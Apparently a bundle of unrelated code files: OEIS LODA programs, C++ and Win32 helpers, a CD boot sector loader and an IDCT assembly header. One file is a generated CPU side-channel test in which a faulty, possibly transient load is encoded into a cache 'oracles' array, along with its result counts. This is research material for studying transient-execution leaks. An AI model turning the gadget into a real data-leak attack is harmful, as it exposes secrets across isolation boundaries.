; $1 = 2^n
pow $1,$0
; $1 = 2^n - 1
sub $1,1
; $1 = 836*2^n - 836
mul $1,836
; $1 = 836*2^n - 676
add $1,160
|
; A090381: Expansion of (1+4x+7x^2)/((1-x)^2*(1-x^2)).
; 1,6,19,36,61,90,127,168,217,270,331,396,469,546,631,720,817,918,1027,1140,1261,1386,1519,1656,1801,1950,2107,2268,2437,2610,2791,2976,3169,3366,3571,3780,3997,4218,4447,4680,4921,5166,5419,5676,5941,6210,6487,6768,7057,7350,7651,7956,8269,8586,8911,9240,9577,9918,10267,10620,10981,11346,11719,12096,12481,12870,13267,13668,14077,14490,14911,15336,15769,16206,16651,17100,17557,18018,18487,18960,19441,19926,20419,20916,21421,21930,22447,22968,23497,24030,24571,25116,25669,26226,26791,27360,27937,28518,29107,29700,30301,30906,31519,32136,32761,33390,34027,34668,35317,35970,36631,37296,37969,38646,39331,40020,40717,41418,42127,42840,43561,44286,45019,45756,46501,47250,48007,48768,49537,50310,51091,51876,52669,53466,54271,55080,55897,56718,57547,58380,59221,60066,60919,61776,62641,63510,64387,65268,66157,67050,67951,68856,69769,70686,71611,72540,73477,74418,75367,76320,77281,78246,79219,80196,81181,82170,83167,84168,85177,86190,87211,88236,89269,90306,91351,92400,93457,94518,95587,96660,97741,98826,99919,101016,102121,103230,104347,105468,106597,107730,108871,110016,111169,112326,113491,114660,115837,117018,118207,119400,120601,121806,123019,124236,125461,126690,127927,129168,130417,131670,132931,134196,135469,136746,138031,139320,140617,141918,143227,144540,145861,147186,148519,149856,151201,152550,153907,155268,156637,158010,159391,160776,162169,163566,164971,166380,167797,169218,170647,172080,173521,174966,176419,177876,179341,180810,182287,183768,185257,186750
; Computes a(n) = [n even] + 3n + 3n^2 (closed form of the g.f. expansion):
; a(0)=1, a(1)=6, a(2)=19, ... matching the listed terms.
mov $4,$0
; $0 = n mod 2
mod $0,2
; $1 = 0^(n mod 2): 1 when n is even, 0 when n is odd
pow $1,$0
; $1 += 3n
mov $2,$4
mul $2,3
add $1,$2
; $1 += 3n^2
mov $3,$4
mul $3,$4
mov $2,$3
mul $2,3
add $1,$2
|
; A245243: Triangle, read by rows, defined by T(n,k) = C(n^2 - k^2, n*k - k^2), for k=0..n, n>=0.
; Submitted by Christian Krause
; 1,1,1,1,3,1,1,28,10,1,1,455,495,35,1,1,10626,54264,8008,126,1,1,324632,10518300,4686825,125970,462,1,1,12271512,3190187286,5586853480,354817320,1961256,1716,1,1,553270671,1399358844975,11899700525790,2254848913647,25140840660,30421755,6435,1,1,28987537150,839983521106400,41432089765583440,28339603908273840,785613562163430,1715884494940,471435600,24310,1,1,1731030945644,662252084388541314,220916541203370737010,641953325024894839320,52588547141148893628,250649105469666120,114456658306760
; NOTE(review): the loop decodes the linear (read-by-rows) index $0 into
; row/column coordinates; the final bin computes the binomial coefficient.
; Per the header this realizes T(n,k) = C(n^2-k^2, n*k-k^2), but the decode
; details are not independently verified here.
lpb $0
add $1,1
sub $0,$1
mov $2,$1
sub $2,$0
lpe
mul $0,$2
mul $1,$2
add $0,$1
; $0 = C($0, $1)
bin $0,$1
|
// Machine-generated helper (see the <gen_prepare_buffer> metadata at the end
// of this file): touches the *_ht buffers with a fixed mix of loads, stores
// and REP MOVS copies, presumably to put caches and fill buffers in a known
// state before the faulty-load experiment below. All registers used are
// saved/restored; the nops and flag-only ALU ops are generator padding.
.global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r15
push %r8
push %r9
push %rax
push %rcx
push %rdi
push %rsi
// Copy 124 bytes addresses_D_ht -> addresses_normal_ht.
lea addresses_D_ht+0x1ebe6, %rsi
lea addresses_normal_ht+0x1c016, %rdi
and %r12, %r12
mov $124, %rcx
rep movsb
nop
nop
nop
nop
nop
add %rax, %rax
// Copy 49 bytes addresses_D_ht -> addresses_normal_ht, source flushed first.
lea addresses_D_ht+0x33a2, %rsi
lea addresses_normal_ht+0x1d216, %rdi
clflush (%rsi)
nop
cmp %r8, %r8
mov $49, %rcx
rep movsb
nop
nop
nop
nop
cmp $30535, %r12
// 8-byte load from a flushed WC_ht address.
lea addresses_WC_ht+0x17ec6, %rdi
clflush (%rdi)
add $2695, %r15
mov (%rdi), %rsi
nop
nop
nop
nop
nop
xor %rdi, %rdi
// 8-byte load from WC_ht.
lea addresses_WC_ht+0x6ecc, %rdi
nop
nop
and $50033, %r8
mov (%rdi), %r12
nop
nop
nop
nop
nop
and %rsi, %rsi
// 16-byte non-temporal store to a 64-byte-aligned A_ht address.
lea addresses_A_ht+0x11c6, %rsi
nop
nop
and $45815, %rdi
mov $0x6162636465666768, %r15
movq %r15, %xmm1
and $0xffffffffffffffc0, %rsi
movntdq %xmm1, (%rsi)
nop
nop
nop
nop
nop
xor $16479, %rsi
// 8-byte store to D_ht.
lea addresses_D_ht+0xc6c6, %r8
nop
nop
nop
nop
nop
dec %rax
mov $0x6162636465666768, %rdi
movq %rdi, (%r8)
nop
cmp $39752, %rcx
// 32-byte store to A_ht.
lea addresses_A_ht+0x59c6, %r8
nop
nop
nop
nop
add $12255, %rsi
mov $0x6162636465666768, %rdi
movq %rdi, %xmm4
vmovups %ymm4, (%r8)
add %r15, %r15
// 4-byte load from D_ht.
lea addresses_D_ht+0x43c6, %r8
nop
dec %rdi
mov (%r8), %ecx
nop
nop
nop
nop
cmp %r15, %r15
// 4-byte load from WC_ht.
lea addresses_WC_ht+0xbacc, %r15
nop
xor $4937, %rsi
mov (%r15), %r8d
nop
nop
and $37558, %rcx
// 8-byte store to a flushed WC_ht address.
lea addresses_WC_ht+0x1464e, %r15
clflush (%r15)
nop
nop
nop
sub %rcx, %rcx
mov $0x6162636465666768, %rdi
movq %rdi, (%r15)
nop
nop
nop
nop
inc %r12
// 16-byte store to A_ht.
lea addresses_A_ht+0xf386, %r12
nop
nop
nop
cmp $38014, %rcx
mov $0x6162636465666768, %r8
movq %r8, %xmm4
movups %xmm4, (%r12)
nop
nop
nop
nop
nop
add $15519, %rcx
// Copy 58 quadwords addresses_normal_ht -> addresses_WT_ht, dest flushed.
lea addresses_normal_ht+0xd246, %rsi
lea addresses_WT_ht+0x2106, %rdi
clflush (%rdi)
nop
sub $7832, %r9
mov $58, %rcx
rep movsq
nop
nop
nop
nop
nop
add $26970, %rax
// 16-byte store to UC_ht.
lea addresses_UC_ht+0x1cca6, %rdi
nop
sub $45483, %rsi
mov $0x6162636465666768, %rax
movq %rax, %xmm1
movups %xmm1, (%rdi)
nop
cmp %r15, %r15
// 4-byte store to A_ht.
lea addresses_A_ht+0x109e6, %rcx
nop
nop
nop
nop
nop
sub %rsi, %rsi
movl $0x61626364, (%rcx)
nop
nop
nop
xor %rdi, %rdi
pop %rsi
pop %rdi
pop %rcx
pop %rax
pop %r9
pop %r8
pop %r15
pop %r12
ret
// Machine-generated experiment body (see <gen_faulty_load> metadata below):
// performs a small REP MOVS, then the "faulty" non-temporal load whose
// (possibly transient) result is encoded into the `oracles` array.
.global s_faulty_load
s_faulty_load:
push %r12
push %r15
push %rax
push %rcx
push %rdi
push %rdx
push %rsi
// REPMOV
lea addresses_D+0x1e7c6, %rsi
lea addresses_A+0xed0c, %rdi
nop
nop
nop
nop
nop
xor $9836, %rax
mov $19, %rcx
rep movsb
nop
cmp %rcx, %rcx
// Faulty Load
lea addresses_A+0x163c6, %rsi
nop
nop
nop
nop
xor %r15, %r15
movntdqa (%rsi), %xmm0
vpextrq $1, %xmm0, %r12
// Encode the loaded byte into `oracles` at a 4 KiB (shl 12) stride —
// presumably recovered later via a cache side channel; confirm in harness.
lea oracles, %rdi
and $0xff, %r12
shlq $12, %r12
mov (%rdi,%r12,1), %r12
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rax
pop %r15
pop %r12
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'size': 32, 'NT': False, 'type': 'addresses_A', 'same': False, 'AVXalign': False, 'congruent': 0}}
{'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_D', 'congruent': 6}, 'dst': {'same': False, 'type': 'addresses_A', 'congruent': 0}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'size': 16, 'NT': True, 'type': 'addresses_A', 'same': True, 'AVXalign': False, 'congruent': 0}}
<gen_prepare_buffer>
{'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_D_ht', 'congruent': 5}, 'dst': {'same': False, 'type': 'addresses_normal_ht', 'congruent': 3}}
{'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_D_ht', 'congruent': 1}, 'dst': {'same': False, 'type': 'addresses_normal_ht', 'congruent': 4}}
{'OP': 'LOAD', 'src': {'size': 8, 'NT': False, 'type': 'addresses_WC_ht', 'same': False, 'AVXalign': False, 'congruent': 8}}
{'OP': 'LOAD', 'src': {'size': 8, 'NT': False, 'type': 'addresses_WC_ht', 'same': False, 'AVXalign': False, 'congruent': 0}}
{'OP': 'STOR', 'dst': {'size': 16, 'NT': True, 'type': 'addresses_A_ht', 'same': False, 'AVXalign': False, 'congruent': 9}}
{'OP': 'STOR', 'dst': {'size': 8, 'NT': False, 'type': 'addresses_D_ht', 'same': False, 'AVXalign': False, 'congruent': 6}}
{'OP': 'STOR', 'dst': {'size': 32, 'NT': False, 'type': 'addresses_A_ht', 'same': False, 'AVXalign': False, 'congruent': 8}}
{'OP': 'LOAD', 'src': {'size': 4, 'NT': False, 'type': 'addresses_D_ht', 'same': False, 'AVXalign': False, 'congruent': 10}}
{'OP': 'LOAD', 'src': {'size': 4, 'NT': False, 'type': 'addresses_WC_ht', 'same': False, 'AVXalign': False, 'congruent': 1}}
{'OP': 'STOR', 'dst': {'size': 8, 'NT': False, 'type': 'addresses_WC_ht', 'same': False, 'AVXalign': False, 'congruent': 3}}
{'OP': 'STOR', 'dst': {'size': 16, 'NT': False, 'type': 'addresses_A_ht', 'same': False, 'AVXalign': False, 'congruent': 6}}
{'OP': 'REPM', 'src': {'same': False, 'type': 'addresses_normal_ht', 'congruent': 7}, 'dst': {'same': False, 'type': 'addresses_WT_ht', 'congruent': 6}}
{'OP': 'STOR', 'dst': {'size': 16, 'NT': False, 'type': 'addresses_UC_ht', 'same': False, 'AVXalign': False, 'congruent': 3}}
{'OP': 'STOR', 'dst': {'size': 4, 'NT': False, 'type': 'addresses_A_ht', 'same': False, 'AVXalign': False, 'congruent': 2}}
{'44': 18, '36': 21628, '00': 2, '46': 181}
00 36 36 46 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 46 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 46 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 46 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 46 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 
36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 46 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 46 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 46 36 36
*/
|
#include "Adapter.h"
/// Default-construct an Adapter.
/// The original empty user-provided body is replaced by an out-of-line
/// defaulted definition: same behavior, but the compiler may treat the
/// constructor as trivial where the class allows it.
Adapter::Adapter() = default;
/// Destroy the Adapter.
/// Out-of-line defaulted definition instead of an empty user-provided
/// body; behavior is identical.
Adapter::~Adapter() = default;
|
template<> std::optional<std::string> ConfigProxy::Get<std::string>(const std::string&) const;
template<> std::optional<bool> ConfigProxy::Get<bool>(const std::string&) const;
template<> std::optional<int64_t> ConfigProxy::Get<int64_t>(const std::string&) const;
template<> std::optional<int32_t> ConfigProxy::Get<int32_t>(const std::string&) const;
template<> std::optional<uint64_t> ConfigProxy::Get<uint64_t>(const std::string&) const;
template<> std::optional<uint32_t> ConfigProxy::Get<uint32_t>(const std::string&) const;
template<> std::optional<float> ConfigProxy::Get<float>(const std::string&) const;
template<> std::optional<double> ConfigProxy::Get<double>(const std::string&) const;
/// Fetch the value for `key`, falling back to `def` when the key is
/// absent or cannot be converted to T (delegates to the single-argument
/// Get<T> overload, which returns std::nullopt in that case).
template<typename T>
T ConfigProxy::Get(const std::string& key, T&& def) const
{
std::optional<T> found = Get<T>(key);
if (found)
return *found;
return std::forward<T>(def);
}
/// Fetch the value for `key`, throwing if it is missing or invalid.
///
/// @throws std::runtime_error naming the resolved key
///         (upper-cased "<module>_<key>") when Get<T>(key) yields no value.
template <typename T>
T ConfigProxy::Require(const std::string& key) const
{
std::optional<T> r = Get<T>(key);
if (!r)
{
std::string resolvedKey = m_moduleName + "_" + key;
// Go through unsigned char: passing a plain (possibly negative) char
// straight to ::toupper is undefined behavior for non-ASCII bytes.
std::transform(std::begin(resolvedKey), std::end(resolvedKey), std::begin(resolvedKey),
               [](unsigned char c) { return static_cast<char>(::toupper(c)); });
throw std::runtime_error("Required config key missing or invalid: " + resolvedKey);
}
return r.value();
}
|
; ===============================================================
; Mar 2014
; ===============================================================
;
; int b_vector_back(b_vector_t *v)
;
; Return char stored at the end of the vector.
; If the vector is empty, return -1.
;
; ===============================================================
SECTION code_clib
SECTION code_adt_b_vector
PUBLIC asm_b_vector_back
EXTERN asm_b_array_back
; b_vector_back has the same implementation as b_array_back, so alias
; the public symbol to it instead of duplicating code (contract is
; documented in the comments below).
defc asm_b_vector_back = asm_b_array_back
; enter : hl = vector *
;
; exit : success
;
; de = & last char in vector
; hl = last char in vector
; carry reset
;
; fail if vector is empty
;
; hl = -1
; carry set
;
; uses : af, bc, de, hl
|
;;
;; Copyright (c) Microsoft Corporation. All rights reserved.
;;
;;;;;;;;;;;;;;;;;;;;
; Concerns
; 1 - there is no error checking on the int13 calls
; 2 - we assume that the block size is 2048 bytes
; 3 - this cannot handle large root directories (>64KB)
;;;;;;;;;;;;;;;;;;;;
; Constants
BootSecOrigin EQU 07c00h ; the BIOS puts the boot sector at 07c0h:0000 == 0000:7c00h
StackOffset EQU -12 ; we will put the stack a small bit below it (we hardly use the stack, so it is safe...)
;;;;;;;;;;;;;;;;;;;;
; Macros
; Emit a far jump (opcode 0EAh) to SEG:OFF; reloads CS as a side effect.
JMPF16 MACRO SEG:REQ,OFF:REQ
db 0eah
dw OFF ; offset first, then segment (x86 little-endian operand order)
dw SEG
ENDM
;;;;;;;;;;;;;;;;;;;;
; Directives
.model tiny
.686p
;;;;;;;;;;;;;;;;;;;;
; Begin Code segment
_TEXT SEGMENT use16 ; 16-bit code segment
.code
ORG 0h ; ETFS puts us at 07c0h:0000
start:
; Normalize CS to 07c0h so labels resolve against ORG 0.
JMPF16 07c0h,OFFSET Step1
Step1: ; set stack and data segments
mov cx, cs
mov ss, cx
mov sp, BootSecOrigin + StackOffset
mov es, cx
mov ds, cx
mov bp, sp
Step2: ; Save the boot drive (dl holds it on boot)
mov [CDDrive], dl
Step3: ; Clear the Screen
; INT 10h AH=00h/AL=02h: set 80x25 text mode, which clears the screen.
mov ax, 02h
int 010h
;; Configure GS to point to the text-mode video console.
mov ax, 0b800h
mov gs, ax
;; Progress markers: high byte 4Fh is the attribute, low byte the char.
;; Write 'A' to position 0.
mov ax, 04f41h
mov gs:[0], ax
;; Write 'B' to position 1.
mov ax, 04f42h
mov gs:[2], ax
Step4: ; Load the PVD to get the Logical Block Size
mov eax, 10h ; the PVD is in the 16th block
mov bx, 2000h
mov es, bx ; transfer address = 2000:0000
mov cx, 1
call ReadDisk
mov ax, es:128 ; block size is at offset 128
mov [BlockSize], ax
;; Write 'C' to position 2.
mov ax, 04f43h
mov gs:[4], ax
Step5: ; Find the Joliet SVD, and then find the Root Directory Information
mov eax, 10h ; start with the PVD, even though it will fail
GetNextVD:
push eax ; remember the block number of the VD being examined
mov cx, 1
call ReadDisk
mov si, OFFSET SVDesc ; [ds:si] points to the desired first 6 bytes of this VD
xor di, di ; [es:di] points to the start of what we just read
mov cx, 6
repe cmpsb
je FoundSVD
mov al, es:0000h
cmp al, 0FFh ; is this the last Volume Descriptor?
je SVDError
pop eax
inc eax
jmp GetNextVD ; try another VD
FoundSVD: ; need to make sure this is a Joliet SVD - we need 025h, 02Fh, 045h in [88,89,90]
mov si, OFFSET JolietSig ; [ds:si] points to the Joliet Signature
mov di, 88 ; [es:di] points to the escape sequence field of the current SVD
mov cx, 3
repe cmpsb
je FoundJoliet
pop eax
inc eax
jmp GetNextVD
FoundJoliet:
; NOTE(review): the eax pushed at GetNextVD is never popped on this path,
; leaving 4 stale bytes on the stack; harmless only because Step8 resets
; ss:sp before jumping onward - confirm.
;; Write 'D' to position 3.
mov ax, 04f44h
mov gs:[6], ax
mov eax, es:158 ; now get the rootstart and rootsize fields
mov [RootStart], eax
mov eax, es:166
mov [RootSize], eax
Step6: ; Load the Root Directory (SVD), and search it for SINGLDR
; On entry eax still holds RootSize (loaded just above).
; NOTE(review): div uses edx:eax but edx is not zeroed here; this relies
; on edx being small/zero from earlier code - confirm.
movzx ebx, [BlockSize]
div ebx ; eax has # blocks in root directory. Round up if necessary:
cmp edx, 0
je ReadyToLoad
add eax, 1
ReadyToLoad: ; we're going to assume that the root directory will not be bigger than 64K
mov ecx, eax
mov eax, [RootStart]
call ReadDisk
xor ebx, ebx ; bx will hold the start of the current entry
CheckEntry:
mov di, bx
add di, 25 ; let's check the file flags - should be 00
mov al, es:[di]
cmp al, 0
jne PrepNextEntry
; file flags are good. now check the file identifier:
mov si, OFFSET Stage2FileSize
xor cx, cx
mov cl, ds:[si] ; first byte is file name length
add cx, 2 ; add two because we check the length byte of the directory entry and the padding byte, too
add di, 7 ; now es:di points to the file length/name field, and ds:si has our desired content
repe cmpsb
je FoundEntry
PrepNextEntry:
xor cx, cx ; increment bx by adding the byte value in es:[bx]
mov cl, es:[bx] ; if es:[bx]==0 and ebx!= [RootSize], then we are in a padding zone
cmp cx, 0 ; designed to prevent a directory entry from spilling over a block.
jne LoadNext ; Should this be the case, we will increment bx until es:[bx] is not null
inc bx
jmp PrepNextEntry
LoadNext:
add bx, cx
cmp ebx, [RootSize]
jl CheckEntry
jmp FileNotFoundError
FoundEntry:
;; Write 'E' to position 4 (the original comment said 5).
mov ax, 04f45h
mov gs:[8], ax
; Directory record: extent LBA at offset 2, data length at offset 10
; (presumably ISO 9660 little-endian fields - verify against spec).
mov eax, es:[bx+2]
mov [FileStart], eax
mov eax, es:[bx+10]
mov [FileSize], eax
Step7: ; Load the file to 57c0:0000
mov cx, 057c0h
mov es, cx
; On entry eax still holds FileSize (loaded at the end of Step6).
; NOTE(review): as in Step6, edx is not zeroed before this div - confirm.
movzx ebx, [BlockSize]
div ebx ; eax = # blocks occupied by the file (not the root directory)
cmp edx, 0 ; on a remainder, there will be one more block
je ReadyToLoadFile
add eax, 1
ReadyToLoadFile:
mov ecx, eax
mov eax, [FileStart]
call ReadDisk
;; Write 'F' to position 5.
mov ax, 04f46h
mov gs:[10], ax
Step8: ; Now we need to set up the stack for SINGLDR and do a jump
xor cx, cx ; Always point the stack to 0000:7c00h - 12
mov ss, cx
mov sp, BootSecOrigin + StackOffset
movzx edx, [CDDrive]
push edx ; SINGLDR will need to know the boot drive #
pushd 04344h ; CD boot signature
pushw offset infloop ; return address = "infloop", which is the infinite loop
push cs ; NOTE(review): CS pushed after the offset; the loaded code must consume these in that order - confirm
;; Write 'G' to position 6.
mov ax, 04f47h
mov gs:[12], ax
; 50007c00h little-endian = offset 7c00h, segment 5000h: jump to
; 5000:7c00, i.e. linear 57C00h - the same byte loaded at 57c0:0000.
db 0EAh ; emit a long jump to 5000:7c00
dd 50007c00h
;;;;;;;;;;;;;;;;;;;;
; ReadDisk
;
; Inputs: eax = Block Number
; cx = number of blocks to read (warning: cx > 32 will cause overflow)
; es = destination segment
; Assumptions: 1 - assumes request will not cause overflow of es:00 (limit on # sectors)
; 2 - assumes int13 extensions available
; Read `cx` 2048-byte blocks starting at block `eax` into es:0000 using
; the INT 13h AH=42h extended read. The 16-byte Disk Address Packet is
; built directly on the stack (size, count, offset, segment, 64-bit LBA)
; and popped afterwards. Per the header concerns: no error checking.
ReadDisk PROC NEAR
pushad
mov dl, [CDDrive] ; set the drive
pushd 00
push eax ; push 64-bit block number (top half always null)
push es
pushw 00h ; push transfer address
push cx ; # sectors
pushw 0010h ; this request packet is 16 bytes
mov ah,42h ; extended read
mov si,sp ; ds:si = address of params
int 13h ; perform the read
add sp, 10h ; clean the stack and return
popad
ret
ReadDisk ENDP
;;;;;;;;;;;;;;;;;;;;
; Error Routines (these are jump points that never return)
; Fatal-error handlers: print a message, then hang forever in the
; anonymous-label loop (@@: / jmp @b jumps back to itself).
SVDError:
mov si, offset SvdFailMsg
call PrintString
@@:
jmp @b
FileNotFoundError:
mov si, offset FileNotFoundMsg
call PrintString
@@:
jmp @b
; Print the NUL-terminated string at ds:si. Each character is emitted
; twice: once written straight into text video memory (gs:[Cursor],
; attribute 47h) and once via BIOS teletype INT 10h AH=0Eh.
; NOTE(review): the dual output looks like leftover debugging - confirm
; which path is intended.
PrintString:
psnext:
lodsb
or al, al
jz done
;;; Write directly to memory.
mov ah, 047h
mov bx, [Cursor]
mov gs:[bx], ax
add bx, 2
mov [Cursor], bx
mov bx, 07h ; normal attribute
mov ah, 0eh ; default print 1 char
int 10h
jmp psnext
done:
ret
infloop:
jmp infloop
;;;;;;;;;;;;;;;;;;;;
; Global Vars
RootStart DD 0
RootSize DD 0
CDDrive DB 0
BlockSize DW 0
FileStart DD 0
FileSize DD 0
Cursor DW 640
;;;;;;;;;;;;;;;;;;;;
; String Constants
SVDesc DB 02h, "CD001"
JolietSig DB 25h, 2fh, 45h ; this is the value of the escape sequence for a Joliet CD
; we'll use it as the signature...
Stage2FileSize DB OFFSET Stage2FilePad - OFFSET Stage2File
Stage2File DB 0,"S",0,"i",0,"n",0,"g",0,"l",0,"d",0,"r" ; in unicode, this is how our filename will appear
Stage2FilePad DB 0
SvdFailMsg DB 10,13,"SVD Failed",0
FileNotFoundMsg DB 10,13,"File not found",0
;;;;;;;;;;;;;;;;;;;;
; Boot Sector Signature
ORG 510
DW 0AA55h
end start
|
#include "WindowsMessageQueue.h"
// Create an auto-reset, initially non-signaled Win32 event with default
// security and no name. Same arguments as the original `CreateEvent(0,
// 0, 0, 0)`, spelled out with nullptr/FALSE for readability.
Event::Event()
{
hEvent = CreateEvent(nullptr, FALSE, FALSE, nullptr);
}
// Release the underlying Win32 event handle.
Event::~Event()
{
CloseHandle(hEvent);
}
// Signal the event. `::` qualifies the global Win32 SetEvent so the
// call does not recurse into this member function.
void Event::SetEvent()
{
::SetEvent(hEvent);
}
// Block the calling thread until the event is signaled (no timeout;
// the wait result is intentionally ignored).
void Event::WaitForEvent()
{
WaitForSingleObject(hEvent, INFINITE);
}
// Wait until either this event is signaled or any message/input arrives
// in the calling thread's queue (QS_ALLEVENTS), and report which one
// woke us up; any other wait status maps to WaitFail.
Event::WaitResult Event::WaitForEventOrMessage()
{
const DWORD status = MsgWaitForMultipleObjects(1, &hEvent, FALSE, INFINITE, QS_ALLEVENTS);
switch (status)
{
case WAIT_OBJECT_0:
    return WaitEvent;
case WAIT_OBJECT_0 + 1:
    return WaitMessage;
default:
    return WaitFail;
}
}
; A225144: a(n) = Sum_{i=n..2*n} i^2*(-1)^i.
; 0,3,11,18,42,45,93,84,164,135,255,198,366,273,497,360,648,459,819,570,1010,693,1221,828,1452,975,1703,1134,1974,1305,2265,1488,2576,1683,2907,1890,3258,2109,3629,2340,4020,2583,4431,2838,4862,3105,5313,3384,5784,3675,6275,3978,6786,4293,7317,4620,7868,4959,8439,5310,9030,5673,9641,6048,10272,6435,10923,6834,11594,7245,12285,7668,12996,8103,13727,8550,14478,9009,15249,9480,16040,9963,16851,10458,17682,10965,18533,11484,19404,12015,20295,12558,21206,13113,22137,13680,23088,14259,24059,14850
; LODA program (machine-mined): $0 holds the input n on entry and the
; sequence value a(n) on exit; $1 accumulates the result and lpb/lpe
; delimit loops conditioned on the named cell.
; NOTE(review): generated code - the arithmetic is not meant to be
; human-readable; verify against the sequence terms listed above.
mov $2,$0
mov $5,$0
lpb $0
add $3,$2
add $1,$3
mov $4,$0
mul $4,$0
lpb $4
sub $4,$3
mod $3,2
lpe
add $1,$4
lpb $0
add $1,$0
sub $0,1
lpe
lpe
mov $6,$5
mul $6,$5
add $1,$6
mov $0,$1
|
;
; idct8x8_xmm.asm
;
; Originally provided by Intel at AP-922
; http://developer.intel.com/vtune/cbts/strmsimd/922down.htm
; (See more app notes at http://developer.intel.com/vtune/cbts/strmsimd/appnotes.htm)
; but in a limited edition.
; New macro implements a column part for precise iDCT
; The routine precision now satisfies IEEE standard 1180-1990.
;
; Copyright (c) 2000-2001 Peter Gubanov <peter@elecard.net.ru>
; Rounding trick Copyright (c) 2000 Michel Lespinasse <walken@zoy.org>
;
; http://www.elecard.com/peter/idct.html
; http://www.linuxvideo.org/mpeg2dec/
;
;=============================================================================
;
; These examples contain code fragments for first stage iDCT 8x8
; (for rows) and first stage DCT 8x8 (for columns)
;
;=============================================================================
mword typedef qword
mptr equ mword ptr
BITS_INV_ACC = 5 ; 4 or 5 for IEEE
SHIFT_INV_ROW = 16 - BITS_INV_ACC
SHIFT_INV_COL = 1 + BITS_INV_ACC
RND_INV_ROW = 1024 * (6 - BITS_INV_ACC) ; 1 << (SHIFT_INV_ROW-1)
RND_INV_COL = 16 * (BITS_INV_ACC - 3) ; 1 << (SHIFT_INV_COL-1)
RND_INV_CORR = RND_INV_COL - 1 ; correction -1.0 and round
BITS_FRW_ACC = 3 ; 2 or 3 for accuracy
SHIFT_FRW_COL = BITS_FRW_ACC
SHIFT_FRW_ROW = BITS_FRW_ACC + 17
RND_FRW_ROW = 262144 * (BITS_FRW_ACC - 1) ; 1 << (SHIFT_FRW_ROW-1)
_MMX = 1
.nolist
.586
if @version GE 612
.mmx
;mmword TEXTEQU <QWORD>
else
include IAMMX.INC
endif
if @version GE 614
.xmm
;mm2word TEXTEQU <QWORD> ; needed for Streaming SIMD Extensions macros
else
include iaxmm.inc ; Streaming SIMD Extensions Emulator Macros
endif
.list
.model flat
_DATA SEGMENT PARA PUBLIC USE32 'DATA'
one_corr sword 1, 1, 1, 1
round_inv_row dword RND_INV_ROW, RND_INV_ROW
round_inv_col sword RND_INV_COL, RND_INV_COL, RND_INV_COL, RND_INV_COL
round_inv_corr sword RND_INV_CORR, RND_INV_CORR, RND_INV_CORR, RND_INV_CORR
